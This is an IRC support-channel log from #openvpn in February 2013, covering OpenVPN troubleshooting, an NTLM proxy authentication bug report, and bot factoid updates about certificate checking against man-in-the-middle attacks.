14:30 -!- phantomcircuit [~phantomci@covertinferno.org] has quit [Ping timeout: 260 seconds]
14:31 < Perun> http://pastebin.com/PrQ998LF does it look ok?
14:31 -!- mirovengi [~mirovengi@209.59.130.4] has joined #openvpn
14:32 < mirovengi> does the openvpn client on the website only work for the paid product? will it work with the community edition?
14:32 < mirovengi> *specifically the windows client
14:32 <@krzee> !as
14:32 <@vpnHelper> "as" is please go to #OpenVPN-AS for help with Access-Server
14:33 <@krzee> they'll know
14:33 -!- Valcorb [~Valcorb@d54C68BC0.access.telenet.be] has joined #openvpn
14:33 < mirovengi> in the meantime, is there a windows client that will connect to openvpn community edition?
14:38 <@krzee> !download
14:38 <@vpnHelper> "download" is (#1) http://openvpn.net/index.php/download/community-downloads.html to download openvpn or (#2) OpenVPN's Windows installer now includes OpenVPN GUI. Don't bother with http://openvpn.se anymore or (#3) Don't trust download.com at all.
It provides an extremely old version with malware: http://insecure.org/news/download-com-fiasco.html or (#4) in the community version of openvpn (only
14:38 <@vpnHelper> thing supported here) there is no separate download for client/server, it is the same install with different configs
14:46 -!- laner [~Lane@cpe-66-65-44-48.nyc.res.rr.com] has joined #openvpn
14:48 -!- giskard [~giskard@static.5.188.47.78.clients.your-server.de] has joined #openvpn
14:48 < giskard> hello
14:49 < giskard> Hello
14:49 < giskard> I get "Bad LZO decompression header byte: 0" message when I try to connect to my openvpn server
14:49 < giskard> (comp-lzo is on, on both server and client conf)
14:49 -!- baobeiiii [~baobeiiii@192.73.244.224] has quit [Quit: Leaving]
14:50 < giskard> So, i deleted the comp-lzo line, and now, I get this: FRAG_IN error flags=0xffffffff: FRAG_TEST not implemented
14:51 < giskard> I found nothing relevant with google
14:51 < giskard> only 2005 messages…
14:54 -!- giskard [~giskard@static.5.188.47.78.clients.your-server.de] has quit [Quit: leaving]
14:58 < Perun> dazo: but I can configure a static ip on each client 192.168.60.1 via 255.255.255.0 dev tun_ovpn_xaphon and 255.255.255.0 dev tun_ovpn_xaphon proto kernel scope link src 192.168.60.140, it is normal?
14:58 < Perun> argh sorry
14:58 < Perun> I see these routes on client now: 192.168.60.1 via 255.255.255.0 dev tun_ovpn_xaphon and 255.255.255.0 dev tun_ovpn_xaphon proto kernel scope link src 192.168.60.140, is it normal?
14:59 -!- dazo is now known as dazo_afk
15:04 -!- ben1066_ is now known as ben1066
15:25 < Perun> I mean it works but is it normal? the ptp address of the tun device is 255.255.255.0 to hmmmm why not the openvpn server ip in the openvpn subnet?
15:27 < mirovengi> what's the shortcut for your bot to get common problems with the windows client? Is there a config check tool?
I'm trying to connect and it doesn't look like it makes it out of the box and yet the log file is empty
15:28 < mirovengi> I can also watch logs on my openvpn server and see it's not getting any connects
15:29 -!- grendal-prime [~sgraham@173-166-255-77-stockton.hfc.comcastbusiness.net] has joined #openvpn
15:30 -!- b1rkh0ff [~b1rkh0ff@178.77.12.33] has quit [Quit: Leaving]
15:30 < grendal-prime> hey guys im really stupid when it comes to windows...(i mean im kinda glad to say that really) but anyway..How do i get the desktop task manager thang to start and run as administrator automatically?
15:30 < grendal-prime> is there like a sudo..type thing for windows?
15:30 <@krzee> services
15:31 < grendal-prime> ya but i dont want it to just start and connect all the time.
15:31 <@krzee> then i dunno
15:31 <@krzee> maybe this:
15:31 < grendal-prime> i need these guys to be able to log out and in. and...i have to push them routes
15:31 <@krzee> right click - properties - compat mode - run as admin
15:31 <@krzee> but i think that requires pw
15:32 -!- mirco [~mirco@p50805527.dip.t-dialin.net] has joined #openvpn
15:32 < grendal-prime> dude thanks
15:32 < grendal-prime> that looks exactly like what i need...
15:32 < grendal-prime> i owe you again...id have been fkn around with that forever
15:33 <@krzee> i dont even use windows, it's just that common :D
15:33 < grendal-prime> looking for a check box..in a window...that i need to select from a drop down...under a fuzzy filter ..
15:33 <@krzee> totally
15:33 <@krzee> lol
15:33 < grendal-prime> how you been man?
15:34 <@krzee> by common i mean commonly not found by people
15:34 <@krzee> :D
15:34 <@krzee> good, finally home from "vacation"
15:34 <@krzee> which was more work than being home
15:34 <@krzee> lol
15:34 < grendal-prime> i hear ya
15:34 <@krzee> launched a new product
15:34 < grendal-prime> i got laid off from my networking job...and its harder being home than it was at work
15:35 <@krzee> did my first interview
15:35 <@krzee> http://www.kittyfeet.com/2013/02/14/jeff-from-liberty-private-network-talks-about-his-secure-bat-phones/
15:35 <@vpnHelper> Title: » Jeff from Liberty Private Network Talks About His Secure Bat Phones. Anarchy Gumbo Podcast (at www.kittyfeet.com)
15:35 < grendal-prime> when you go to work every day..your wife just keeps adding to a list of crap you need to do and then when you get laid off ..you get that list.
15:36 -!- spitf1r3 [~quassel@89.200.144.70] has quit [Ping timeout: 260 seconds]
15:40 -!- mirovengi [~mirovengi@209.59.130.4] has left #openvpn []
15:47 -!- speed_racer8 [~speed_rac@c-76-30-149-251.hsd1.tx.comcast.net] has quit [Ping timeout: 248 seconds]
15:49 -!- phantomcircuit [~phantomci@covertinferno.org] has joined #openvpn
15:53 -!- Orbi [~opera@anon-163-27.vpn.ipredator.se] has left #openvpn []
15:57 -!- nickanderson is now known as nickanderson_afk
15:58 -!- sw0rdfish [sw0rdfish@unaffiliated/sw0rdfish] has quit [Ping timeout: 240 seconds]
15:59 -!- phantomcircuit [~phantomci@covertinferno.org] has quit [Quit: quit]
16:02 -!- sw0rdfish [sw0rdfish@bouncing.users.since.2011.panicbnc.org] has joined #openvpn
16:08 -!- phantomcircuit [~phantomci@covertinferno.org] has joined #openvpn
16:10 < hazardous> krzee: yo
16:11 -!- KaiForce [~chatzilla@adsl-70-228-64-42.dsl.akrnoh.ameritech.net] has quit [Quit: ChatZilla 0.9.90 [Firefox 18.0.2/20130201065344]]
16:12 -!- mikkel [~mikkel@80-71-132-15.u.parknet.dk] has quit [Quit: Leaving]
16:13 < novaflash> right
16:13 < novaflash> !cert
16:13 < novaflash> !search certificates
16:13 <@vpnHelper> There were no matching configuration variables.
16:13 < novaflash> nyatg.
16:13 < novaflash> !certificates
16:13 < novaflash> !pingpongballs
16:13 < hazardous> !novaflash
16:13 < hazardous> !cisco
16:13 <@vpnHelper> "cisco" is (#1) An open-source client for Cisco SSL VPN is available from http://www.infradead.org/openconnect.html or (#2) OpenConnect is available in FreeBSD ports in security/openconnect
16:13 < hazardous> well that's less fun
16:13 < novaflash> i like our !cisco better
16:15 < Perun> I want to add a route to the openvpn server to a network behind a client if the client connects... is it possible?
16:15 < Perun> only for one client
16:15 < novaflash> !gateway
16:15 < novaflash> why don't these knowledge things have any names i know!
16:15 < novaflash> !route
16:15 <@vpnHelper> "route" is (#1) http://www.secure-computing.net/wiki/index.php/OpenVPN/Routing or https://community.openvpn.net/openvpn/wiki/RoutedLans (same page mirrored) if you have lans behind openvpn, read it DONT SKIM IT or (#2) READ IT DONT SKIM IT!
or (#3) See !tcpip for more info about a more basic networking guide
16:25 -!- Valcorb [~Valcorb@d54C68BC0.access.telenet.be] has quit [Ping timeout: 256 seconds]
16:35 -!- gffa [~unknown@unaffiliated/gffa] has quit [Quit: sleep]
16:46 -!- grendal-prime [~sgraham@173-166-255-77-stockton.hfc.comcastbusiness.net] has quit [Ping timeout: 276 seconds]
16:47 -!- hg_5 [~chatzilla@unaffiliated/hg-5/x-8664886] has quit [Read error: Connection reset by peer]
16:48 -!- NomeFalso [~Aralucc10@151.77.232.145] has quit [Ping timeout: 255 seconds]
16:49 -!- krzee [nobody@openvpn/community/support/krzee] has quit [Ping timeout: 272 seconds]
16:57 -!- sw0rdfish [sw0rdfish@bouncing.users.since.2011.panicbnc.org] has quit [Changing host]
16:57 -!- sw0rdfish [sw0rdfish@unaffiliated/sw0rdfish] has joined #openvpn
17:18 -!- DrCode [~DrCode@gateway/tor-sasl/drcode] has quit [Remote host closed the connection]
17:20 -!- Cpt-Oblivious [Cpt-Oblivi@a202101.upc-a.chello.nl] has quit [Ping timeout: 276 seconds]
17:22 -!- NuclearMeltdown [~rep@unaffiliated/antiliberal] has quit [Ping timeout: 245 seconds]
17:25 -!- emmanuelux [~emmanuelu@vau92-2-82-228-217-1.fbx.proxad.net] has joined #openvpn
18:04 -!- hg_5 [~chatzilla@unaffiliated/hg-5/x-8664886] has joined #openvpn
18:11 -!- plut0 [~cory@pool-96-236-43-69.albyny.fios.verizon.net] has joined #openvpn
18:12 < plut0> getting this error when connecting, "received corrupted data from proxy server".
client config: http://pastebin.com/hX9Cs7uV client log: http://pastebin.com/WkCKewP9
18:24 -!- mndo [~mndo@bl17-70-52.dsl.telepac.pt] has joined #openvpn
18:25 -!- ihre [~kaas@86.86.252.187] has joined #openvpn
18:27 -!- neilhwatson [~neil@cl-274.chi-03.us.sixxs.net] has joined #openvpn
18:31 -!- bumblebee [~bumblebee@cpe-66-65-132-80.nyc.res.rr.com] has joined #openvpn
18:31 -!- hydroxyhydride [~bumblebee@cpe-66-65-132-80.nyc.res.rr.com] has joined #openvpn
18:43 -!- grendal-prime [~sgraham@adsl-99-22-153-166.dsl.skt2ca.sbcglobal.net] has joined #openvpn
18:43 -!- grendal-prime [~sgraham@adsl-99-22-153-166.dsl.skt2ca.sbcglobal.net] has quit [Client Quit]
18:46 -!- speed_racer8 [~speed_rac@c-98-196-168-201.hsd1.tx.comcast.net] has joined #openvpn
18:46 -!- DrCode [~DrCode@gateway/tor-sasl/drcode] has joined #openvpn
18:46 -!- ihre [~kaas@86.86.252.187] has quit [Read error: Connection reset by peer]
18:47 -!- ihre [~kaas@86.86.252.187] has joined #openvpn
18:48 < plut0> anyone?
18:52 -!- brute11k1 [~brute11k@89.249.235.210] has joined #openvpn
18:54 -!- brute11k [~brute11k@89.249.235.210] has quit [Ping timeout: 264 seconds]
18:58 -!- nickanderson_afk is now known as nickanderson
18:58 -!- emmanuelux [~emmanuelu@vau92-2-82-228-217-1.fbx.proxad.net] has quit [Remote host closed the connection]
18:59 -!- nickanderson is now known as nickanderson_afk
19:04 -!- mndo [~mndo@bl17-70-52.dsl.telepac.pt] has quit [Ping timeout: 276 seconds]
19:05 -!- Valcorb [~Valcorb@d54C68BC0.access.telenet.be] has joined #openvpn
19:05 -!- Valcorb [~Valcorb@d54C68BC0.access.telenet.be] has quit [Read error: Connection reset by peer]
19:10 -!- sauce [sauce@unaffiliated/sauce] has joined #openvpn
19:10 -!- sauce [sauce@unaffiliated/sauce] has quit [Excess Flood]
19:11 -!- sauce [sauce@unaffiliated/sauce] has joined #openvpn
19:12 -!- hg_5 [~chatzilla@unaffiliated/hg-5/x-8664886] has quit [Ping timeout: 272 seconds]
19:13 -!- sauce [sauce@unaffiliated/sauce] has quit [Excess Flood]
19:15 -!- hydroxyhydride [~bumblebee@cpe-66-65-132-80.nyc.res.rr.com] has quit [Ping timeout: 260 seconds]
19:15 -!- bumblebee [~bumblebee@cpe-66-65-132-80.nyc.res.rr.com] has quit [Ping timeout: 260 seconds]
19:16 -!- hydroxyhydride [~bumblebee@cpe-66-65-132-80.nyc.res.rr.com] has joined #openvpn
19:16 -!- bumblebee [~bumblebee@cpe-66-65-132-80.nyc.res.rr.com] has joined #openvpn
19:42 -!- hydroxyhydride [~bumblebee@cpe-66-65-132-80.nyc.res.rr.com] has quit [Ping timeout: 252 seconds]
19:42 -!- bumblebee [~bumblebee@cpe-66-65-132-80.nyc.res.rr.com] has quit [Ping timeout: 252 seconds]
19:45 < pekster> plut0: Near as I can tell from the code, you'll get that if the ntlm_phase_3 routine fails to return expected data from the proxy. Maybe some setting isn't right on your client; possibly see the --show-proxy-settings flag to openvpn, or check your proxy server's logs
19:46 < plut0> pekster: did you see this post? https://forums.openvpn.net/topic11158.html
19:46 <@vpnHelper> Title: OpenVPN Support Forum http-proxy with TMG return malformed packet in wireshark : Configuration (at forums.openvpn.net)
19:46 < plut0> pekster: seems like an outstanding bug with a patch for 2.1 but nothing newer
19:47 < plut0> pekster: sorry this link, https://forums.openvpn.net/topic7945.html
19:47 <@vpnHelper> Title: OpenVPN Support Forum OpenVPN client behind ISA ( Forefront TMG ) : Configuration (at forums.openvpn.net)
19:50 -!- laner [~Lane@cpe-66-65-44-48.nyc.res.rr.com] has quit [Quit: Computer has gone to sleep.]
19:51 < pekster> plut0: You could try a patched build with line 502 in proxy.c changed to "char buf2[512];" per the 2nd forum link, although I'm not sure what the ramifications are
19:52 < pekster> plut0: Oh, and probably line 625 to match too
19:52 < pekster> ie: 511 there
19:53 < plut0> pekster: it's a windows client and i'm not capable of building that
19:56 < plut0> guess i should file a bug huh?
19:56 < pekster> I can't confirm if that source fix is even valid or not; I'm just pointing you to where I think that reference is in the 2.3.0 source-tree
19:56 < plut0> i'm going to file a bug
19:56 < pekster> I don't have an NTLM-enabled proxy, so I'm not able to test the problem
19:57 < plut0> especially since others have the same issue
19:57 * ecrist checks in
19:57 < pekster> What did you find out with the option I gave you above that'll try and get your proxy info?
19:58 < plut0> pekster: i haven't tried that yet, is that passed on the client?
19:58 < pekster> The manpage would know
19:58 < pekster> !man
19:58 <@vpnHelper> "man" is (#1) For man pages, see http://openvpn.net/index.php/open-source/documentation/manuals/ or (#2) the man pages are your friend!
19:59 < pekster> It's often a good idea to look up options you're recommended to check out
19:59 < plut0> booting up other laptop to test again, give me a minute
20:02 -!- laner [~Lane@cpe-66-65-44-48.nyc.res.rr.com] has joined #openvpn
20:06 -!- mirco [~mirco@p50805527.dip.t-dialin.net] has quit [Quit: mirco]
20:08 < pekster> If you do end up with persistent problems, this might be an already-opened bug you can use instead of opening a duplicate: https://community.openvpn.net/openvpn/ticket/94
20:08 <@vpnHelper> Title: #94 (NTLM proxy authentication does not work well) – OpenVPN Community (at community.openvpn.net)
20:08 < pekster> It appears to be the same issue
20:08 < plut0> guess i can't do this remotely
20:10 < pekster> Well, first step is to verify the info you're trying to use is valid.
Your config has "basic" auth listed, but then the logs list NTLM being attempted, which I find a bit odd
20:10 < pekster> Hence why I wanted to know what the Windows auto-discovery found about your proxy
20:10 < plut0> i tried it both ways
20:11 -!- sauce [sauce@unaffiliated/sauce] has joined #openvpn
20:11 < pekster> It might be worth linking to the 2nd forum post (the one with the actual source details)
20:11 -!- raidz is now known as raidz_away
20:12 < pekster> Oh, and I had my source references wrong: it's ntlm.c that post was referring to
20:12 < plut0> is it the same bug?
20:13 < pekster> Maybe. I dunno
20:13 < pekster> https://community.openvpn.net/openvpn/attachment/ticket/94/openvpn-ntlm-error1.png suggests it might be
20:13 <@vpnHelper> Title: openvpn-ntlm-error1.png on Ticket #94 – Attachment – OpenVPN Community (at community.openvpn.net)
20:13 < pekster> See what a wire trace shows you
20:13 < pekster> Append it if it looks relevant
20:15 < pekster> https://forums.openvpn.net/topic7945.html
20:15 <@vpnHelper> Title: OpenVPN Support Forum OpenVPN client behind ISA ( Forefront TMG ) : Configuration (at forums.openvpn.net)
20:16 < pekster> Someone said one of the patches worked well on the 2nd page. Include that reference, perhaps
20:16 < plut0> pekster: if i use show-proxy-settings, there is no log output
20:17 < pekster> Interesting, I guess it didn't do what I expected
20:18 < plut0> yeah not sure why that is
20:18 < pekster> Well, between the forum reference and your logs, you probably have enough for a bugreport, although without knowing exactly what's going wrong over the wire it might get tough to debug. See the forum reference for some of the issues there, and maybe make a note on the thread too with your details
20:19 < pekster> I assume the proxy works in a browser with the same settings, for instance?
20:19 < plut0> yup
20:19 < plut0> used for 1000+ clients just fine
20:20 < pekster> Then it appears to be related to that bug, and certainly the forum entry
20:21 < plut0> hmm wait a minute
20:23 < plut0> wonder if any of these other options would help
20:29 < plut0> got a wireshark here
20:29 < plut0> ntlmssp_negotiate (malformed packet)
20:29 < pekster> Compare the sequence of commands exchanged with a functional proxy request
20:30 < pekster> See if you need to change any options openvpn is using, or if it appears to be a fault in the exchange spoken
20:30 < pekster> Add what you find to any report you file as relevant
20:31 < plut0> ok through a browser it says ntlmssp_negotiate
20:31 < plut0> without the malformed packet
20:36 < plut0> malformed packet exception occurred
20:36 < plut0> so says wireshark
20:37 < plut0> pekster: want me to file a new bug or add to this one?
20:38 <@ecrist> plut0: if you can provide specific steps to reproduce your bug, please open a ticket
20:39 < plut0> ok
20:39 <@ecrist> the easier you make the issue to reproduce and test, the more likely your bug will be resolved
20:40 < plut0> how are you going to reproduce it if you don't have the appropriate proxy?
20:41 < plut0> hmm how do i report a bug? i'm logged in and don't see an option
20:41 -!- Denial [Denial@cpc15-tonb3-2-0-cust76.16-3.cable.virginmedia.com] has quit []
20:41 < plut0> nm i found it
20:44 -!- laner [~Lane@cpe-66-65-44-48.nyc.res.rr.com] has quit [Quit: Computer has gone to sleep.]
20:49 -!- [fred] [fred@konfuzi.us] has quit [Ping timeout: 246 seconds]
20:49 < plut0> ecrist: pekster: here you go, https://community.openvpn.net/openvpn/ticket/259#comment:1
20:49 <@vpnHelper> Title: #259 (received corrupted data from proxy server) – OpenVPN Community (at community.openvpn.net)
20:50 <@ecrist> plut0: how are we going to fix something we can't reproduce?
20:50 < pekster> That lacks your config, log output, the packet details, or the reproduction details.
As far as bugreports go, it's a poor quality one
20:52 < pekster> 20:13:41 < pekster> See what a wire trace shows you
20:52 < pekster> 20:13:47 < pekster> Append it if it looks relevant
20:52 < pekster> [...]
20:52 < pekster> 20:29:53 < pekster> Compare the sequence of commands exchanged with a functional proxy
20:52 < pekster> request
20:52 < pekster> 20:30:14 < pekster> See if you need to change any options openvpn is using, or if it appears
20:52 < pekster> to be a fault in the exchange spoken
20:53 < pekster> 20:30:37 < pekster> Add what you find to any report you file as relevant
20:53 < pekster> [...]
20:53 < pekster> 20:39:23 <@ecrist> the easier you make the issue to reproduce and test, the more likely your
20:53 < pekster> dammit
20:53 * pekster steps away from chat for a bit
20:53 < pekster> The URL I intended to paste: fpaste.org/ADX2/
20:53 < plut0> attached my config and log
20:54 <@ecrist> plut0: message 4 in the forum thread you link specifically asks for a wireshark capture. :)
20:55 < plut0> ecrist: not sure i can do that, sensitive data
20:56 <@ecrist> !topsecret
20:56 <@vpnHelper> "topsecret" is if your setup is so top secret that you cant post your configs or logs, please leave now and go find support you trust.
20:56 <@ecrist> plut0: you should be able to filter your tcpdump
20:57 < plut0> if this isn't working with ntlm shouldn't that be easy to reproduce?
20:57 <@ecrist> the problem you're going to run into is nobody cares
20:57 <@ecrist> devs tend to fix problems they 1) know about, 2) care about
20:57 <@ecrist> or 3) someone makes easy for them to fix
20:57 < plut0> someone did make a patch
20:58 <@ecrist> we're not going to patch openvpn without being able to test/verify it works
20:58 <@ecrist> have you tested the patch?
20:58 <@ecrist> did it work for you?
20:58 < plut0> ecrist: no because the patch is for 2.1
20:58 <@ecrist> so hand-patch 2.3
20:58 -!- [fred] [~fred@konfuzi.us] has joined #openvpn
20:58 < plut0> ecrist: i don't have the tools to build a windows client
20:58 <@ecrist> you're asking us to put more work in than you're willing to
20:59 < plut0> how am i going to build the windows client?
20:59 <@ecrist> meh - you created a ticket, someone might get to it
20:59 <@ecrist> if that's not OK, you can have your money back?
20:59 <@ecrist> :P
21:00 < plut0> can i press a button and it builds everything for me - or - do i have to install 5 pieces of software on a windows machine and fuss around for hours trying to compile it?
21:00 <@ecrist> for windows, it's a fuss
21:00 < plut0> i imagine
21:00 <@ecrist> you don't have a unix box around?
21:00 < plut0> i do
21:00 -!- SkeeterB [SkeeterB@70-41-105-173.cust.wildblue.net] has joined #openvpn
21:01 < SkeeterB> hi
21:01 <@ecrist> so patch that and test it on the linux box
21:01 <@ecrist> then you can at least demonstrate it works
21:01 < plut0> i can't bring the linux desktop to work and try it
21:01 <@ecrist> and maybe provide an updated patch for the 2.3 branch
21:01 -!- laner [~Lane@cpe-66-65-44-48.nyc.res.rr.com] has joined #openvpn
21:02 <@ecrist> plut0: install virtualbox on that windows box, and put a linux vm on there
21:02 <@ecrist> test that way
21:02 < plut0> ecrist: easier said than done
21:03 <@ecrist> like i said, you created a ticket, and that's where it'll stay until a dev gets to it
21:03 < SkeeterB> my computer is wonky, its gotten where i can't access some sites without going through my ISP's proxy server. I don't want to do that if I am connected to a VPN. That kind of defeats the purpose of a VPN doesn't it?
21:03 <@ecrist> fwiw, looking at that patch, it's not trivial
21:04 < plut0> ecrist: so it won't get fixed probably?
21:04 <@ecrist> plut0: I'm not saying that, but I don't expect to see anyone jump on it any time soon
21:04 < plut0> ecrist: the other bug pekster linked was 2 years old :(
21:04 <@ecrist> SkeeterB: depends on your VPN config
21:05 <@ecrist> plut0: the forum post isn't a proper way to report a bug
21:05 < plut0> ecrist: no it was an actual bug
21:05 < SkeeterB> I've tried using other VPNs not OpenVPN but PPTP VPNs and it does the same thing.
21:05 <@ecrist> SkeeterB: do you have your VPN configured to redirect the default gateway?
21:05 <@ecrist> and what are you using for DNS?
21:06 <@ecrist> I'm guessing they're doing some odd DNS resolution to partially cause your error
21:06 < SkeeterB> my internet goes through my router
21:06 < plut0> ecrist: https://community.openvpn.net/openvpn/ticket/94
21:06 <@vpnHelper> Title: #94 (NTLM proxy authentication does not work well) – OpenVPN Community (at community.openvpn.net)
21:06 <@ecrist> right, and your DNS is assigned via DHCP, probably from your ISP, which is passed into your internal network.
21:07 <@ecrist> I've pinged the developers, plut0. it's all we can do
21:07 < plut0> ecrist: thank you, i appreciate it
21:11 < SkeeterB> yeah my DNS is set through my ISP's DHCP, I've used openDNS briefly, and it did ok
21:12 -!- bumblebee [~bumblebee@cpe-66-65-132-80.nyc.res.rr.com] has joined #openvpn
21:12 -!- hydroxyhydride [~bumblebee@cpe-66-65-132-80.nyc.res.rr.com] has joined #openvpn
21:17 < dbhaber_> bored
21:17 < dbhaber_> pfsense makes openvpn so easy
21:18 -!- laner [~Lane@cpe-66-65-44-48.nyc.res.rr.com] has quit [Quit: Computer has gone to sleep.]
21:18 < rob0> as long as you're not doing anything unusual, and until something goes wrong ... then pfsense is a nightmare.
21:19 -!- laner [~Lane@cpe-66-65-44-48.nyc.res.rr.com] has joined #openvpn
21:21 <@ecrist> heh
21:21 <@ecrist> about a year ago, the lead dev of pfsense and I nearly got into a fist fight
21:21 <@ecrist> in large part, due to the shitty implementation of openvpn they had at the time
21:24 < uberushaximus> what was his defense?
21:26 <@ecrist> I don't recall
21:26 <@ecrist> we were both well-lubed with beer
21:28 -!- bumblebee [~bumblebee@cpe-66-65-132-80.nyc.res.rr.com] has quit [Ping timeout: 272 seconds]
21:28 -!- hydroxyhydride [~bumblebee@cpe-66-65-132-80.nyc.res.rr.com] has quit [Ping timeout: 272 seconds]
21:31 -!- plut0 [~cory@pool-96-236-43-69.albyny.fios.verizon.net] has left #openvpn []
21:31 -!- Harleyman [~SkeeterB@149.255.32.238] has joined #openvpn
21:32 < Harleyman> I'm actually connected to IRC using PrivateTunnel
21:32 -!- SkeeterB [SkeeterB@70-41-105-173.cust.wildblue.net] has quit [Read error: Connection reset by peer]
21:33 < Harleyman> i'm SkeeterB, that other was a ghost.
21:34 < Harleyman> It actually shows I'm connected on the Privatetunnel site.
21:41 -!- nutron [~nutron@unaffiliated/nutron] has quit [Read error: Connection reset by peer]
21:50 -!- Harleyman [~SkeeterB@149.255.32.238] has left #openvpn []
22:00 -!- laner [~Lane@cpe-66-65-44-48.nyc.res.rr.com] has quit [Quit: Computer has gone to sleep.]
22:11 -!- laner [~Lane@cpe-66-65-44-48.nyc.res.rr.com] has joined #openvpn
22:20 -!- nutron [~nutron@unaffiliated/nutron] has joined #openvpn
22:22 -!- nutron [~nutron@unaffiliated/nutron] has quit [Max SendQ exceeded]
22:22 -!- nutron [~nutron@unaffiliated/nutron] has joined #openvpn
22:28 -!- else- [~else@towely.iodev.org] has quit [Read error: Operation timed out]
22:53 -!- laner [~Lane@cpe-66-65-44-48.nyc.res.rr.com] has quit [Quit: Computer has gone to sleep.]
22:58 -!- gladiatr [~sdspence@openvpn/community/support/gladiatr] has quit [Read error: Operation timed out]
22:59 -!- ihre [~kaas@86.86.252.187] has quit [Read error: Operation timed out]
23:42 -!- Orbi [~opera@109.129.18.33] has joined #openvpn
--- Day changed Thu Feb 21 2013
00:13 -!- jthunder [~jthunder@174.3.126.51] has joined #openvpn
00:18 -!- krzee [nobody@hemp.ircpimps.org] has joined #openvpn
00:18 -!- krzee [nobody@hemp.ircpimps.org] has quit [Changing host]
00:18 -!- krzee [nobody@openvpn/community/support/krzee] has joined #openvpn
00:18 -!- mode/#openvpn [+o krzee] by ChanServ
00:18 <@krzee> novaflash,
00:18 <@krzee> !factoids
00:19 <@vpnHelper> "factoids" is A semi-regularly updated dump of factoids database is available at http://www.secure-computing.net/factoids.php
00:19 <@krzee> thats all of the keys the bot knows
00:21 < pekster> krzee: You the bot admin? I shot you a memo, but it still thinks I'm scum
00:40 -!- Orbi [~opera@109.129.18.33] has left #openvpn []
00:49 <@krzee> weird, i seem to have +owner but not have +admin on it, and cant login right now, will look later
00:52 <@krzee> ahh nevermind im in =]
00:52 -!- vpnHelper [~vpnHelper@openvpn/bot/vpnHelper] has quit [Remote host closed the connection]
01:02 -!- vpnHelper [~vpnHelper@openvpn/bot/vpnHelper] has joined #openvpn
01:02 -!- mode/#openvpn [+o vpnHelper] by ChanServ
01:03 -!- vpnHelper [~vpnHelper@openvpn/bot/vpnHelper] has quit [Client Quit]
01:04 -!- vpnHelper [~vpnHelper@openvpn/bot/vpnHelper] has joined #openvpn
01:04 -!- mode/#openvpn [+o vpnHelper] by ChanServ
01:05 -!- vpnHelper [~vpnHelper@openvpn/bot/vpnHelper] has quit [Client Quit]
01:06 -!- vpnHelper [~vpnHelper@openvpn/bot/vpnHelper] has joined #openvpn
01:06 -!- mode/#openvpn [+o vpnHelper] by ChanServ
01:09 -!- vpnHelper [~vpnHelper@openvpn/bot/vpnHelper] has quit [Client Quit]
01:17 < pekster> Is there anything required to make autoconf work besides the online docs invocation of 'autoconf -v -i' ?
I'm trying to test what should be a trivial patch, and autoconf throws errors about macros I didn't change: http://paste.kde.org/677402/
01:18 -!- vpnHelper [~vpnHelper@openvpn/bot/vpnHelper] has joined #openvpn
01:18 -!- mode/#openvpn [+o vpnHelper] by ChanServ
01:18 -!- vpnHelper [~vpnHelper@openvpn/bot/vpnHelper] has quit [Client Quit]
01:20 <@krzee> dammit, i should have copied the userfile, supybot decided to delete half of it because of hostmask overlap
01:20 <@krzee> EugeneKay, im gunna need to readd you, sorry
01:21 < EugeneKay> Mrh?
01:21 < EugeneKay> Oh
01:21 < EugeneKay> S'ok, my hostmask has changed anyway
01:21 < EugeneKay> Actually, just give me a bot user account
01:21 < EugeneKay> I can mangle it myself :-p
01:21 <@krzee> you had one til a minute ago
01:21 < EugeneKay> Har
01:23 < pekster> fwiw, I also get the same build error (just slightly different line numbers) without my code changes, so it's not just my patch
01:23 <@krzee> youd prolly have better results in the dev chan
01:24 < pekster> Yea, I can cross-post there. I'll re-paste with the line numbers and output from a vanilla 2.3.0 tag checkout
01:25 * EugeneKay goes back to drinking
01:41 -!- vpnHelper [~vpnHelper@openvpn/bot/vpnHelper] has joined #openvpn
01:42 -!- mode/#openvpn [+o vpnHelper] by ChanServ
01:42 * pekster stabs autoconf with a rusty fork
01:42 <@krzee> EugeneKay / pekster you are both added, should be able to change your password
01:42 < pekster> Got it working (at least enough to test my patch.)
This thing spits out awful errors
01:43 <@krzee> and should be able to use !learn !forget
01:44 < pekster> Great, now I !forgot what entry I had a pending update for :P
01:45 < pekster> !mitm
01:45 <@vpnHelper> "mitm" is (#1) http://openvpn.net/index.php/documentation/howto.html#mitm to know about stopping Man-in-the-Middle attacks by signing the server cert specially or (#2) use !servercert to generate the server cert manually or use the easy-rsa build-key-server script to build your server certificates or (#3) then use: ns-cert-type server in the client config
01:45 < pekster> !forget mitm 3
01:45 <@vpnHelper> Joo got it.
01:46 < pekster> !learn mitm then use: "remote-cert-tls server" in the client config
01:46 <@vpnHelper> (learn [<channel>] <key> as <value>) -- Associates <key> with <value>. <channel> is only necessary if the message isn't sent on the channel itself. The word 'as' is necessary to separate the key from the value. It can be changed to another word via the learnSeparator registry value.
01:46 < pekster> !learn mitm as then use: "remote-cert-tls server" in the client config
01:46 <@vpnHelper> Joo got it.
01:46 <@krzee> depends how it was signed
01:46 < pekster> That works with easy-rsa
01:46 <@krzee> good enough
01:46 < pekster> And should be preferred to "Netscape" extensions
01:47 < pekster> It does a better job of checking EKU fields
01:47 <@krzee> for convention… but is there anything gained?
01:47 <@krzee> (for our small use case)
01:48 -!- jthunder [~jthunder@174.3.126.51] has quit [Quit: jthunder]
01:49 < pekster> Probably not, but this method is listed as a better choice in the official howto
01:50 <@krzee> right, iirc james said that because its the standard convention
01:51 < pekster> Personally, I just use --remote-cert-eku, but I'm not going to push that on people wanting the quick solution via easy-rsa
01:52 < pekster> remote-cert-tls checks ku and eku for the relevant OIDs; technically we wouldn't even need the silly ns-cert-type field anymore, but it'll have to stay in easy-rsa for backwards-compat reasons at this point
01:54 <@krzee> little change in security, but no reason to use the old one
01:54 < pekster> Yea, exactly. It's just an extra wasted field taking up bytes
01:55 * pekster shrugs. The factoid won't hurt anyone unless they're using a 2.0.x or earlier release. Quite frankly they need to update, because lots of what the bot tells them won't work with stuff that old
01:55 <@krzee> i mean config option
01:56 <@krzee> but ya that too
01:57 < pekster> And yes, I like things to be "proper" :P
02:03 -!- defswork [~andy@141.0.50.105] has quit [Ping timeout: 252 seconds]
02:16 -!- defswork [~andy@141.0.50.105] has joined #openvpn
02:18 -!- mirco [~mirco@p50806731.dip.t-dialin.net] has joined #openvpn
02:27 -!- mikkel [~mikkel@80-71-132-15.u.parknet.dk] has joined #openvpn
02:38 < matsh> pekster: Can you assign ip aliases for tun interfaces in openvpn.conf to allow a jail on the openvpn server to access the vpn?
02:41 < pekster> No idea why you're asking me specifically
02:43 < pekster> The concept of a network "alias" is used to assign >1 IP on systems that can't do that on the device itself. I don't work often with BSD systems and can't help much with that
